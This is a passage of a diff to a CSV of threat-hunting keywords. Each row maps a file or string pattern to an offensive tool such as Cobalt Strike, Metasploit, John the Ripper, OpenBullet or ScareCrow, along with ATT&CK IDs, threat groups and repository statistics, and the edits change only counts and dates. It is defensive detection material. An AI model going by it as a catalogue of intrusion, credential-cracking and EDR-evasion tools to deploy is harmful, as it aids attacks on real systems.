T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" 
@@ -14332,7 +14497,7 @@ "*onecloudemoji/CVE-2022-30190*","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","107","33","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" "*OneDrive Enumerator*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" "*onedrive_enum.py*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" -"*onedrive_exports_version_dll.txt*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*onedrive_exports_version_dll.txt*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" "*onedrive_user_enum.git*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation 
tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" "*One-Lin3r*","offensive_tool_keyword","One-Lin3r","One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows. Linux. macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).","T1059 - T1003 - T1053","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/One-Lin3r","1","1","N/A","N/A","10","1596","307","2022-02-10T18:17:57Z","2018-01-14T21:26:04Z" "*onesixtyone -c *snmp_default_pass.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
@@ -14345,19 +14510,19 @@ "*openBeaconBrowser*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openBeaconConsole*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openBeaconConsole*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*openbsd_softraid2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openbsd_softraid2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*OpenBullet.csproj*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.pdb*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.sln*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web 
Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*openbullet/openbullet*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" -"*OpenBullet2.Console.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" -"*OpenBullet2.Native.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" -"*OpenBullet2.Native.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" -"*OpenBullet2.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" -"*openbullet2:latest*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - 
TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" -"*OpenBullet2-master*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" +"*OpenBullet2.Console.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2.Native.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2.Native.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2.zip*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*openbullet2:latest*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - 
T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*OpenBullet2-master*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" "*OpenBulletApp.cs*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBulletCLI.csproj*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBulletCLI.exe*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" 
@@ -14374,56 +14539,56 @@ "*openPortScanner*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openPortScanner*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 
- T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openSpearPhishDialog*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*openssl_heartbleed.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*openssl2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openssl_heartbleed.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*openssl2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*OpenVAS*","offensive_tool_keyword","openvas","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.openvas.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*openwall.John.appdata.xml*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*openwall.John.desktop*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*openwall/john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openwall.John.appdata.xml*","offensive_tool_keyword","john","John the 
Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openwall.John.desktop*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*openwall/john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*openWindowsExecutableStage*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Operative Framework*","offensive_tool_keyword","Operative Framework","Framework based on fingerprint action. this tool is used for get information on a website or a enterprise target with multiple modules.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0007 - TA0011 - TA0007","N/A","N/A","Frameworks","https://github.com/graniet/operative-framework","1","0","N/A","N/A","7","634","180","2023-05-12T06:20:09Z","2017-01-03T08:38:59Z" "*ophcrack*","offensive_tool_keyword","ophcrack","Windows password cracker based on rainbow tables.","T1110.003 - T1555.003 - T1110.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://gitlab.com/objectifsecurite/ophcrack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*optiv/Registry-Recon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","10","10","314","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z" -"*optiv/ScareCrow*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*optiv/ScareCrow*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*oracle_default_hashes.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
